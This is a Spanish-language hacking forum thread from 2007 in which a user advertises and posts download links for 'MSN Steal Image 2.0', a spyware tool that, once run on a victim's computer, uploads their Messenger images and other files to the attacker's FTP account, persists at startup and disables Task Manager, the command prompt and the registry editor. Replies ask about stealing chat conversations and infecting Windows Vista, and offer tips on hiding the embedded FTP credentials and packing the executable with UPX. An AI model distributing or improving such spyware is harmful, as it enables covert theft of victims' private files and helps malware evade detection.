elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 07:39  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  MSN Steal Image 2.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: MSN Steal Image 2.0  (Leído 3,312 veces)
juanin21

Desconectado Desconectado

Mensajes: 11


Ver Perfil
MSN Steal Image 2.0
« en: 23 Noviembre 2007, 21:32 »

Hola a todos!
No se si recordareis un programa que hice hace ya un tiempo..
Era un programa que una vez ejecutado en el PC de la victima, te enviaba sus fotos de Messenger..:P..Pues bien aqui esta de nuevo, mejorado y mas facil de utilizar.
El programa tiene filtrado de archivos ( .exe, .jpg, .doc.. ), se ejecuta al inicio de Windows, restringe el equipo infectado ( administrador tareas, msdos, regedit ), se guarda una copia en la carpeta del sistema, se cifra los datos introducidos ( login ftp, archivos..). El unico requisito es tener una cuenta FTP donde recibir los archivos, yo por ejemplo la tengo en http://usuarios.lycos.es/ y la verdad que va muy bien, ademas te dan 1GB..en fin..espero que os guste y para cualquier duda o sugerencia ya sabeis.
Aqui os pongo una captura del programa para que lo veais.
http://s1.subirimagenes.com/imagenes/previo/thump_1670286msnSI20.jpg
Y aqui os pongo el link de descarga..
http://www.megaupload.com/?d=353DIPH5

Un saludo !! ::)
« Última modificación: 23 Noviembre 2007, 21:44 por juanin21 » En línea
Tengu


Desconectado Desconectado

Mensajes: 332


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: MSN Steal Image 2.0
« Respuesta #1 en: 24 Noviembre 2007, 01:54 »

no tenes podria ser en rapidshare? xfavor si no es  molestia. Saludos
En línea


Encuentros por Video y Chat !!
juanin21

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #2 en: 24 Noviembre 2007, 12:34 »

Si claro, aqui lo tienes..
http://rapidshare.com/files/71915622/msnSImg20.rar.html

Un saludo!
En línea
DanyKadiz


Desconectado Desconectado

Mensajes: 739


Desde Cádiz para el mundo


Ver Perfil WWW
Re: MSN Steal Image 2.0
« Respuesta #3 en: 24 Noviembre 2007, 12:37 »

Está curioso el programa, la verdad esque no lo conocia :D
En línea

Noxors


Desconectado Desconectado

Mensajes: 642



Ver Perfil WWW
Re: MSN Steal Image 2.0
« Respuesta #4 en: 24 Noviembre 2007, 22:08 »

pero creo recordar que de estos han salido varios, y yo mismo me encargue de enviar el archivo por correo a un usuario de aqui para investigarlo y que fuera añadido a las bases de datos de avg creo que era. Era el de fotos_posse creo.
En línea

Dios lo hizo todo bien menos una cosa: Le puso limites a todo, menos a la estupidez...
juanin21

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #5 en: 25 Noviembre 2007, 02:03 »

Pues si te digo la verdad, Noxors nunca habia visto ninguno que hiciera esto, por eso me puse hacerlo yo :P
El de fotos_posse lo escuchado pero no se que hace exactamente...alguien lo sabe??

Un saludo ;)
En línea
Noxors


Desconectado Desconectado

Mensajes: 642



Ver Perfil WWW
Re: MSN Steal Image 2.0
« Respuesta #6 en: 25 Noviembre 2007, 02:16 »

Pues no te dejaba abrir el administrador de tareas, enviaba a todos los contactos del msn el archivo colapsandote a ti tu msn.

Una solucion muy facil era abrir el webmessenger y ya no te afectaba
En línea

Dios lo hizo todo bien menos una cosa: Le puso limites a todo, menos a la estupidez...
hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #7 en: 25 Noviembre 2007, 19:53 »

De casualidad no roba conversaciones ?

y si el server funciona en windows vista
En línea


juanin21

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #8 en: 26 Noviembre 2007, 12:49 »

No, no roba conversaciones...pero bueno tengo previsto hacer otra version del programa con algunas funciones, se podria mirar la forma de hacerlo...si :)
No esta probado en Windows Vista, pero no creo que haya ningun problema, si quieres pruebalo y me dices..

Un saludo ;)
En línea
byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #9 en: 26 Noviembre 2007, 14:01 »

Citar
se cifra los datos introducidos ( login ftp, archivos..)

usa una encriptacion mas fuerte ya que el mismo programa te descifra la clave. es decir un usuario que le llege un archivo creado puede saber los datos del ftp.
En línea
hackpsycho


Desconectado Desconectado

Mensajes: 391



Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #10 en: 27 Noviembre 2007, 00:04 »

Citar
se cifra los datos introducidos ( login ftp, archivos..)

usa una encriptacion mas fuerte ya que el mismo programa te descifra la clave. es decir un usuario que le llege un archivo creado puede saber los datos del ftp.

Cierto tiene raazon, y te puden cachar !!!!! , jajaj ,

y no tegno windows vista, solo lo decia para aver si infecto aun con windows Vista
En línea


juanin21

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #11 en: 27 Noviembre 2007, 08:40 »

El programa llega a la victima cifrado, pero los datos no se revelan de ninguna forma, el server lee los datos que tiene y segun eso actua.
De que forma creeis que podra averiguarlo ?
Comprimiendo el ejecutable con algun compresor tipo UPX..quizas sea un poco mas dificil no?? No creo que mandemos este tipo de programa a gente muy experimentada...

Un saludo, y gracias ;)
« Última modificación: 27 Noviembre 2007, 08:43 por juanin21 » En línea
byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #12 en: 27 Noviembre 2007, 13:32 »

forma de hacerlo facil y rapido. te bajas el programa, cojes los datos que hay al final del archivo los metes en una casilla y creas un server nuevo, ahi tienes los datos descifrados. yo usaria algun algoritmo que dejase introducir clave de cifrado,esa clave logicamente no deberia estar al final del archivo y si lo ponemos mejor no deberia estar presente.
En línea
juanin21

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #13 en: 27 Noviembre 2007, 14:29 »

Hola ®® me perdio en lo primero que has dicho..
Cuando abres el archivo y cojes lo del final, eso esta cifrado, el mismo programa es el que lo descifra..pero el usuario no lo ve..creo yo vamos, ya me estas haciendo dudar..me lo podrias explicar mas despacio... :)

Gracias, ;)
En línea
byebye


Desconectado Desconectado

Mensajes: 5.094



Ver Perfil
Re: MSN Steal Image 2.0
« Respuesta #14 en: 27 Noviembre 2007, 19:27 »

digamos que me envias a mi el ejecutable, y yo como no me fio me da por mirar. lo abro con un editor hexadecimal y veo algo extraño al final del ejecutable (aparte de 0 lo demas que se encuentre al final deberia ser revisado). pues bien cojes esos datos los usas como datos tal cual y el resultado son los datos descifrados. para que lo veas mejor, ponme aqui algo cifrado con el y veras el resultado.
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines